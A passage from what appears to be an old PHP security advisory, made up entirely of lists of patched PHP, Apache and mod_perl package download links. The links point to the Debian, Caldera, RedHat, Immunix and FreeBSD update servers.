http://security.debian.org/dists/potato/updates/main/binary-m68k/php4-imap_4.0.3-0potato1_m68k.deb
http://security.debian.org/dists/potato/updates/main/binary-m68k/php4-ldap_4.0.3-0potato1_m68k.deb
http://security.debian.org/dists/potato/updates/main/binary-m68k/php4-mhash_4.0.3-0potato1_m68k.deb
http://security.debian.org/dists/potato/updates/main/binary-m68k/php4-mysql_4.0.3-0potato1_m68k.deb
http://security.debian.org/dists/potato/updates/main/binary-m68k/php4-pgsql_4.0.3-0potato1_m68k.deb
http://security.debian.org/dists/potato/updates/main/binary-m68k/php4-snmp_4.0.3-0potato1_m68k.deb
http://security.debian.org/dists/potato/updates/main/binary-m68k/php4-xml_4.0.3-0potato1_m68k.deb
http://security.debian.org/dists/potato/updates/main/binary-m68k/php4_4.0.3-0potato1_m68k.deb
http://security.debian.org/dists/potato/updates/main/binary-powerpc/php4-cgi-gd_4.0.3-0potato1_powerpc.deb
http://security.debian.org/dists/potato/updates/main/binary-powerpc/php4-cgi-imap_4.0.3-0potato1_powerpc.deb
http://security.debian.org/dists/potato/updates/main/binary-powerpc/php4-cgi-ldap_4.0.3-0potato1_powerpc.deb
http://security.debian.org/dists/potato/updates/main/binary-powerpc/php4-cgi-mhash_4.0.3-0potato1_powerpc.deb
http://security.debian.org/dists/potato/updates/main/binary-powerpc/php4-cgi-mysql_4.0.3-0potato1_powerpc.deb
http://security.debian.org/dists/potato/updates/main/binary-powerpc/php4-cgi-pgsql_4.0.3-0potato1_powerpc.deb
http://security.debian.org/dists/potato/updates/main/binary-powerpc/php4-cgi-snmp_4.0.3-0potato1_powerpc.deb
http://security.debian.org/dists/potato/updates/main/binary-powerpc/php4-cgi-xml_4.0.3-0potato1_powerpc.deb
http://security.debian.org/dists/potato/updates/main/binary-powerpc/php4-cgi_4.0.3-0potato1_powerpc.deb
http://security.debian.org/dists/potato/updates/main/binary-powerpc/php4-gd_4.0.3-0potato1_powerpc.deb
http://security.debian.org/dists/potato/updates/main/binary-powerpc/php4-imap_4.0.3-0potato1_powerpc.deb
http://security.debian.org/dists/potato/updates/main/binary-powerpc/php4-ldap_4.0.3-0potato1_powerpc.deb
http://security.debian.org/dists/potato/updates/main/binary-powerpc/php4-mhash_4.0.3-0potato1_powerpc.deb
http://security.debian.org/dists/potato/updates/main/binary-powerpc/php4-mysql_4.0.3-0potato1_powerpc.deb
http://security.debian.org/dists/potato/updates/main/binary-powerpc/php4-pgsql_4.0.3-0potato1_powerpc.deb
http://security.debian.org/dists/potato/updates/main/binary-powerpc/php4-snmp_4.0.3-0potato1_powerpc.deb
http://security.debian.org/dists/potato/updates/main/binary-powerpc/php4-xml_4.0.3-0potato1_powerpc.deb
http://security.debian.org/dists/potato/updates/main/binary-powerpc/php4_4.0.3-0potato1_powerpc.deb
http://security.debian.org/dists/potato/updates/main/binary-sparc/php4-cgi-gd_4.0.3-0potato1_sparc.deb
http://security.debian.org/dists/potato/updates/main/binary-sparc/php4-cgi-imap_4.0.3-0potato1_sparc.deb
http://security.debian.org/dists/potato/updates/main/binary-sparc/php4-cgi-ldap_4.0.3-0potato1_sparc.deb
http://security.debian.org/dists/potato/updates/main/binary-sparc/php4-cgi-mhash_4.0.3-0potato1_sparc.deb
http://security.debian.org/dists/potato/updates/main/binary-sparc/php4-cgi-mysql_4.0.3-0potato1_sparc.deb
http://security.debian.org/dists/potato/updates/main/binary-sparc/php4-cgi-pgsql_4.0.3-0potato1_sparc.deb
http://security.debian.org/dists/potato/updates/main/binary-sparc/php4-cgi-snmp_4.0.3-0potato1_sparc.deb
http://security.debian.org/dists/potato/updates/main/binary-sparc/php4-cgi-xml_4.0.3-0potato1_sparc.deb
http://security.debian.org/dists/potato/updates/main/binary-sparc/php4-cgi_4.0.3-0potato1_sparc.deb
http://security.debian.org/dists/potato/updates/main/binary-sparc/php4-gd_4.0.3-0potato1_sparc.deb
http://security.debian.org/dists/potato/updates/main/binary-sparc/php4-imap_4.0.3-0potato1_sparc.deb
http://security.debian.org/dists/potato/updates/main/binary-sparc/php4-ldap_4.0.3-0potato1_sparc.deb
http://security.debian.org/dists/potato/updates/main/binary-sparc/php4-mhash_4.0.3-0potato1_sparc.deb
http://security.debian.org/dists/potato/updates/main/binary-sparc/php4-mysql_4.0.3-0potato1_sparc.deb
http://security.debian.org/dists/potato/updates/main/binary-sparc/php4-pgsql_4.0.3-0potato1_sparc.deb
http://security.debian.org/dists/potato/updates/main/binary-sparc/php4-snmp_4.0.3-0potato1_sparc.deb
http://security.debian.org/dists/potato/updates/main/binary-sparc/php4-xml_4.0.3-0potato1_sparc.deb
http://security.debian.org/dists/potato/updates/main/binary-sparc/php4_4.0.3-0potato1_sparc.deb
For Caldera Systems:
ftp://ftp.calderasystems.com/pub/updates/eServer/2.3/current/RPMS/
ftp://ftp.calderasystems.com/pub/updates/eServer/2.3/current/SRPMS
RPMS/mod_php3-3.0.17-1S.i386.rpm
RPMS/mod_php3-doc-3.0.17-1S.i386.rpm
SRPMS/mod_php3-3.0.17-1S.src.rpm
ftp://ftp.calderasystems.com/pub/updates/eDesktop/2.4/current/RPMS/
ftp://ftp.calderasystems.com/pub/updates/eDesktop/2.4/current/SRPMS
RPMS/mod_php3-3.0.17-1D.i386.rpm
RPMS/mod_php3-doc-3.0.17-1D.i386.rpm
SRPMS/mod_php3-3.0.17-1D.src.rpm
For RedHat:
ftp://updates.redhat.com/5.2/alpha/apache-1.3.14-2.5.x.alpha.rpm
ftp://updates.redhat.com/5.2/alpha/apache-devel-1.3.14-2.5.x.alpha.rpm
ftp://updates.redhat.com/5.2/alpha/mod_perl-1.19-2.alpha.rpm
ftp://updates.redhat.com/5.2/alpha/php-3.0.17-1.5.x.alpha.rpm
ftp://updates.redhat.com/5.2/alpha/php-manual-3.0.17-1.5.x.alpha.rpm
ftp://updates.redhat.com/5.2/alpha/php-pgsql-3.0.17-1.5.x.alpha.rpm
ftp://updates.redhat.com/5.2/sparc/apache-1.3.14-2.5.x.sparc.rpm
ftp://updates.redhat.com/5.2/sparc/apache-devel-1.3.14-2.5.x.sparc.rpm
ftp://updates.redhat.com/5.2/sparc/mod_perl-1.19-2.sparc.rpm
ftp://updates.redhat.com/5.2/sparc/php-3.0.17-1.5.x.sparc.rpm
ftp://updates.redhat.com/5.2/sparc/php-manual-3.0.17-1.5.x.sparc.rpm
ftp://updates.redhat.com/5.2/sparc/php-pgsql-3.0.17-1.5.x.sparc.rpm
ftp://updates.redhat.com/5.2/i386/apache-1.3.14-2.5.x.i386.rpm
ftp://updates.redhat.com/5.2/i386/apache-devel-1.3.14-2.5.x.i386.rpm
ftp://updates.redhat.com/5.2/i386/mod_perl-1.19-2.i386.rpm
ftp://updates.redhat.com/5.2/i386/php-3.0.17-1.5.x.i386.rpm
ftp://updates.redhat.com/5.2/i386/php-manual-3.0.17-1.5.x.i386.rpm
ftp://updates.redhat.com/5.2/i386/php-pgsql-3.0.17-1.5.x.i386.rpm
ftp://updates.redhat.com/5.2/SRPMS/apache-1.3.14-2.5.x.src.rpm
ftp://updates.redhat.com/5.2/SRPMS/mod_perl-1.19-2.src.rpm
ftp://updates.redhat.com/5.2/SRPMS/php-3.0.17-1.5.x.src.rpm
ftp://updates.redhat.com/6.2/alpha/apache-1.3.14-2.6.2.alpha.rpm
ftp://updates.redhat.com/6.2/alpha/apache-devel-1.3.14-2.6.2.alpha.rpm
ftp://updates.redhat.com/6.2/alpha/apache-manual-1.3.14-2.6.2.alpha.rpm
ftp://updates.redhat.com/6.2/alpha/mod_perl-1.23-3.alpha.rpm
ftp://updates.redhat.com/6.2/alpha/php-3.0.17-1.6.0.alpha.rpm
ftp://updates.redhat.com/6.2/alpha/php-imap-3.0.17-1.6.0.alpha.rpm
ftp://updates.redhat.com/6.2/alpha/php-manual-3.0.17-1.6.0.alpha.rpm
ftp://updates.redhat.com/6.2/sparc/apache-1.3.14-2.6.2.sparc.rpm
ftp://updates.redhat.com/6.2/sparc/apache-devel-1.3.14-2.6.2.sparc.rpm
ftp://updates.redhat.com/6.2/sparc/apache-manual-1.3.14-2.6.2.sparc.rpm
ftp://updates.redhat.com/6.2/sparc/mod_perl-1.23-3.sparc.rpm
ftp://updates.redhat.com/6.2/sparc/php-3.0.17-1.6.0.sparc.rpm
ftp://updates.redhat.com/6.2/sparc/php-imap-3.0.17-1.6.0.sparc.rpm
ftp://updates.redhat.com/6.2/sparc/php-manual-3.0.17-1.6.0.sparc.rpm
ftp://updates.redhat.com/6.2/sparc/php-pgsql-3.0.17-1.6.0.sparc.rpm
ftp://updates.redhat.com/6.2/i386/apache-1.3.14-2.6.2.i386.rpm
ftp://updates.redhat.com/6.2/i386/apache-devel-1.3.14-2.6.2.i386.rpm
ftp://updates.redhat.com/6.2/i386/apache-manual-1.3.14-2.6.2.i386.rpm
ftp://updates.redhat.com/6.2/i386/mod_perl-1.23-3.i386.rpm
ftp://updates.redhat.com/6.2/i386/php-3.0.17-1.6.0.i386.rpm
ftp://updates.redhat.com/6.2/i386/php-imap-3.0.17-1.6.0.i386.rpm
ftp://updates.redhat.com/6.2/i386/php-manual-3.0.17-1.6.0.i386.rpm
ftp://updates.redhat.com/6.2/i386/php-pgsql-3.0.17-1.6.0.i386.rpm
ftp://updates.redhat.com/6.2/SRPMS/apache-1.3.14-2.6.2.src.rpm
ftp://updates.redhat.com/6.2/SRPMS/mod_perl-1.23-3.src.rpm
ftp://updates.redhat.com/6.2/SRPMS/php-3.0.17-1.6.0.src.rpm
ftp://updates.redhat.com/6.2/alpha/apache-1.3.14-2.6.2.alpha.rpm
ftp://updates.redhat.com/6.2/alpha/apache-devel-1.3.14-2.6.2.alpha.rpm
ftp://updates.redhat.com/6.2/alpha/apache-manual-1.3.14-2.6.2.alpha.rpm
ftp://updates.redhat.com/6.2/alpha/auth_ldap-1.4.0-3.alpha.rpm
ftp://updates.redhat.com/6.2/alpha/mod_perl-1.23-3.alpha.rpm
ftp://updates.redhat.com/6.2/alpha/php-3.0.17-1.6.1.alpha.rpm
ftp://updates.redhat.com/6.2/alpha/php-imap-3.0.17-1.6.1.alpha.rpm
ftp://updates.redhat.com/6.2/alpha/php-ldap-3.0.17-1.6.1.alpha.rpm
ftp://updates.redhat.com/6.2/alpha/php-manual-3.0.17-1.6.1.alpha.rpm
ftp://updates.redhat.com/6.2/alpha/php-pgsql-3.0.17-1.6.1.alpha.rpm
ftp://updates.redhat.com/6.2/sparc/apache-1.3.14-2.6.2.sparc.rpm
ftp://updates.redhat.com/6.2/sparc/apache-devel-1.3.14-2.6.2.sparc.rpm
ftp://updates.redhat.com/6.2/sparc/apache-manual-1.3.14-2.6.2.sparc.rpm
ftp://updates.redhat.com/6.2/sparc/auth_ldap-1.4.0-3.sparc.rpm
ftp://updates.redhat.com/6.2/sparc/mod_perl-1.23-3.sparc.rpm
ftp://updates.redhat.com/6.2/sparc/php-3.0.17-1.6.1.sparc.rpm
ftp://updates.redhat.com/6.2/sparc/php-imap-3.0.17-1.6.1.sparc.rpm
ftp://updates.redhat.com/6.2/sparc/php-ldap-3.0.17-1.6.1.sparc.rpm
ftp://updates.redhat.com/6.2/sparc/php-manual-3.0.17-1.6.1.sparc.rpm
ftp://updates.redhat.com/6.2/sparc/php-pgsql-3.0.17-1.6.1.sparc.rpm
ftp://updates.redhat.com/6.2/i386/apache-1.3.14-2.6.2.i386.rpm
ftp://updates.redhat.com/6.2/i386/apache-devel-1.3.14-2.6.2.i386.rpm
ftp://updates.redhat.com/6.2/i386/apache-manual-1.3.14-2.6.2.i386.rpm
ftp://updates.redhat.com/6.2/i386/auth_ldap-1.4.0-3.i386.rpm
ftp://updates.redhat.com/6.2/i386/mod_perl-1.23-3.i386.rpm
ftp://updates.redhat.com/6.2/i386/php-3.0.17-1.6.1.i386.rpm
ftp://updates.redhat.com/6.2/i386/php-imap-3.0.17-1.6.1.i386.rpm
ftp://updates.redhat.com/6.2/i386/php-ldap-3.0.17-1.6.1.i386.rpm
ftp://updates.redhat.com/6.2/i386/php-manual-3.0.17-1.6.1.i386.rpm
ftp://updates.redhat.com/6.2/i386/php-pgsql-3.0.17-1.6.1.i386.rpm
ftp://updates.redhat.com/6.2/SRPMS/apache-1.3.14-2.6.2.src.rpm
ftp://updates.redhat.com/6.2/SRPMS/auth_ldap-1.4.0-3.src.rpm
ftp://updates.redhat.com/6.2/SRPMS/mod_perl-1.23-3.src.rpm
ftp://updates.redhat.com/6.2/SRPMS/php-3.0.17-1.6.1.src.rpm
ftp://updates.redhat.com/6.2/alpha/apache-1.3.14-2.6.2.alpha.rpm
ftp://updates.redhat.com/6.2/alpha/apache-devel-1.3.14-2.6.2.alpha.rpm
ftp://updates.redhat.com/6.2/alpha/apache-manual-1.3.14-2.6.2.alpha.rpm
ftp://updates.redhat.com/6.2/alpha/auth_ldap-1.4.0-3.alpha.rpm
ftp://updates.redhat.com/6.2/alpha/mod_perl-1.23-3.alpha.rpm
ftp://updates.redhat.com/6.2/alpha/php-3.0.17-1.6.2.alpha.rpm
ftp://updates.redhat.com/6.2/alpha/php-imap-3.0.17-1.6.2.alpha.rpm
ftp://updates.redhat.com/6.2/alpha/php-ldap-3.0.17-1.6.2.alpha.rpm
ftp://updates.redhat.com/6.2/alpha/php-manual-3.0.17-1.6.2.alpha.rpm
ftp://updates.redhat.com/6.2/alpha/php-pgsql-3.0.17-1.6.2.alpha.rpm
ftp://updates.redhat.com/6.2/sparc/apache-1.3.14-2.6.2.sparc.rpm
ftp://updates.redhat.com/6.2/sparc/apache-devel-1.3.14-2.6.2.sparc.rpm
ftp://updates.redhat.com/6.2/sparc/apache-manual-1.3.14-2.6.2.sparc.rpm
ftp://updates.redhat.com/6.2/sparc/auth_ldap-1.4.0-3.sparc.rpm
ftp://updates.redhat.com/6.2/sparc/mod_perl-1.23-3.sparc.rpm
ftp://updates.redhat.com/6.2/sparc/php-3.0.17-1.6.2.sparc.rpm
ftp://updates.redhat.com/6.2/sparc/php-imap-3.0.17-1.6.2.sparc.rpm
ftp://updates.redhat.com/6.2/sparc/php-ldap-3.0.17-1.6.2.sparc.rpm
ftp://updates.redhat.com/6.2/sparc/php-manual-3.0.17-1.6.2.sparc.rpm
ftp://updates.redhat.com/6.2/sparc/php-pgsql-3.0.17-1.6.2.sparc.rpm
ftp://updates.redhat.com/6.2/i386/apache-1.3.14-2.6.2.i386.rpm
ftp://updates.redhat.com/6.2/i386/apache-devel-1.3.14-2.6.2.i386.rpm
ftp://updates.redhat.com/6.2/i386/apache-manual-1.3.14-2.6.2.i386.rpm
ftp://updates.redhat.com/6.2/i386/auth_ldap-1.4.0-3.i386.rpm
ftp://updates.redhat.com/6.2/i386/mod_perl-1.23-3.i386.rpm
ftp://updates.redhat.com/6.2/i386/php-3.0.17-1.6.2.i386.rpm
ftp://updates.redhat.com/6.2/i386/php-imap-3.0.17-1.6.2.i386.rpm
ftp://updates.redhat.com/6.2/i386/php-ldap-3.0.17-1.6.2.i386.rpm
ftp://updates.redhat.com/6.2/i386/php-manual-3.0.17-1.6.2.i386.rpm
ftp://updates.redhat.com/6.2/i386/php-pgsql-3.0.17-1.6.2.i386.rpm
ftp://updates.redhat.com/6.2/SRPMS/apache-1.3.14-2.6.2.src.rpm
ftp://updates.redhat.com/6.2/SRPMS/auth_ldap-1.4.0-3.src.rpm
ftp://updates.redhat.com/6.2/SRPMS/mod_perl-1.23-3.src.rpm
ftp://updates.redhat.com/6.2/SRPMS/php-3.0.17-1.6.2.src.rpm
ftp://updates.redhat.com/7.0/i386/apache-1.3.14-3.i386.rpm
ftp://updates.redhat.com/7.0/i386/apache-devel-1.3.14-3.i386.rpm
ftp://updates.redhat.com/7.0/i386/apache-manual-1.3.14-3.i386.rpm
ftp://updates.redhat.com/7.0/i386/mod_ssl-2.7.1-3.i386.rpm
ftp://updates.redhat.com/7.0/i386/mod_php-4.0.3pl1-1.i386.rpm
ftp://updates.redhat.com/7.0/i386/php-4.0.3pl1-1.i386.rpm
ftp://updates.redhat.com/7.0/i386/php-imap-4.0.3pl1-1.i386.rpm
ftp://updates.redhat.com/7.0/i386/php-ldap-4.0.3pl1-1.i386.rpm
ftp://updates.redhat.com/7.0/i386/php-manual-4.0.3pl1-1.i386.rpm
ftp://updates.redhat.com/7.0/i386/php-mysql-4.0.3pl1-1.i386.rpm
ftp://updates.redhat.com/7.0/i386/php-pgsql-4.0.3pl1-1.i386.rpm
ftp://updates.redhat.com/7.0/SRPMS/apache-1.3.14-3.src.rpm
ftp://updates.redhat.com/7.0/SRPMS/php-4.0.3pl1-1.src.rpm
Immunix has released the following packages for Immunix OS 6.2
(StackGuarded versions of the RedHat packages):
http://www.immunix.org:8080/ImmunixOS/6.2/updates/RPMS/apache-1.3.14-2.6.2_StackGuard.i386.rpm
http://www.immunix.org:8080/ImmunixOS/6.2/updates/RPMS/apache-devel-1.3.14-2.6.2_StackGuard.i386.rpm
http://www.immunix.org:8080/ImmunixOS/6.2/updates/RPMS/apache-manual-1.3.14-2.6.2_StackGuard.i386.rpm
http://www.immunix.org:8080/ImmunixOS/6.2/updates/RPMS/auth_ldap-1.4.0-3_StackGuard.i386.rpm
http://www.immunix.org:8080/ImmunixOS/6.2/updates/RPMS/mod_perl-1.23-3_StackGuard.i386.rpm
http://www.immunix.org:8080/ImmunixOS/6.2/updates/RPMS/php-3.0.17-1.6.2_StackGuard.i386.rpm
http://www.immunix.org:8080/ImmunixOS/6.2/updates/RPMS/php-imap-3.0.17-1.6.2_StackGuard.i386.rpm
http://www.immunix.org:8080/ImmunixOS/6.2/updates/RPMS/php-ldap-3.0.17-1.6.2_StackGuard.i386.rpm
http://www.immunix.org:8080/ImmunixOS/6.2/updates/RPMS/php-manual-3.0.17-1.6.2_StackGuard.i386.rpm
http://www.immunix.org:8080/ImmunixOS/6.2/updates/RPMS/php-pgsql-3.0.17-1.6.2_StackGuard.i386.rpm
http://www.immunix.org:8080/ImmunixOS/6.2/updates/SRPMS/apache-1.3.14-2.6.2_StackGuard.src.rpm
http://www.immunix.org:8080/ImmunixOS/6.2/updates/SRPMS/auth_ldap-1.4.0-3_StackGuard.src.rpm
http://www.immunix.org:8080/ImmunixOS/6.2/updates/SRPMS/mod_perl-1.23-3_StackGuard.src.rpm
http://www.immunix.org:8080/ImmunixOS/6.2/updates/SRPMS/php-3.0.17-1.6.2_StackGuard.src.rpm
For FreeBSD:
[php3]
ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/i386/packages-3-stable/www/mod_php-3.0.17.tgz
ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/i386/packages-4-stable/www/mod_php-3.0.17.tgz
ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/alpha/packages-4-stable/www/mod_php-3.0.17.tgz
ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/i386/packages-5-current/www/mod_php-3.0.17.tgz
ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/alpha/packages-5-current/www/mod_php-3.0.17.tgz
[php4]
ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/i386/packages-3-stable/www/mod_php-4.0.3pl1.tgz
ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/i386/packages-4-stable/www/mod_php-4.0.3pl1.tgz
ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/alpha/packages-4-stable/www/mod_php-4.0.3pl1.tgz
ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/i386/packages-5-current/www/mod_php-4.0.3pl1.tgz
ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/alpha/packages-5-current/www/mod_php-4.0.3pl1.tgz